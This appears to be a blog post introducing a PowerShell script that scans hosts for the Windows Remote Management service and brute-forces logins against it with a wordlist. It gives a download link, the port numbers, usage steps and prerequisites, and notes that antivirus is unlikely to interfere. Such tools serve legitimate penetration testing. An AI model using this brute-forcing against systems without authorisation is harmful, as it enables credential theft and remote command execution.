WinRM_Brute_Scanner Guide

Blue cyber future technology concept background Premium Vector

WinRM_Brute_Scanner.ps1 allows you to scan and brute force the WinRM service remotely.


I wrote this script to be able to scan for this service on a Windows system. Because this uses PowerShell commands, no AV should interfere, and no additional modules are required.  Once obtained, remote commands can be sent.

Download: https://github.com/ctrlaltdel-blog/WinRM_Brute_Scanner

WinRM Ports:

  • Port: 5985 (http)
  • Port: 5986 (https)

To find out more about the service: https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management

Importing Module

First you must download and import the module:

Import-Module [Script location]

Scanning

To scan the device, we can use the function: winrm_scanner

Once ran, you will need to select 1 of 2 options.

  • Option 1: Single IP
  • Option 2: Multiple IPs (IP List)

To generate an IP List, you could use this online tool: http://magic-cookie.co.uk/iplist.html

Option 1: Single IP

Simply enter the IP or Hostname

Option 2: IP List

Simply enter the text file location. IPs need to be on separate lines.

Brute Force

To brute force the service, you can use the winrm_brute function.

You will need to supply the following:

  • IP or Hostname
  • Username
  • Wordlist Location

For this to be successful, you will need to meet the following requirements:

  • Be a trusted machine (Get-Item WSMan:\localhost\Client\TrustedHosts)
  • Be on the same domain (depending on restrictions)
  • Be able to reach the remote device (Firewall)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s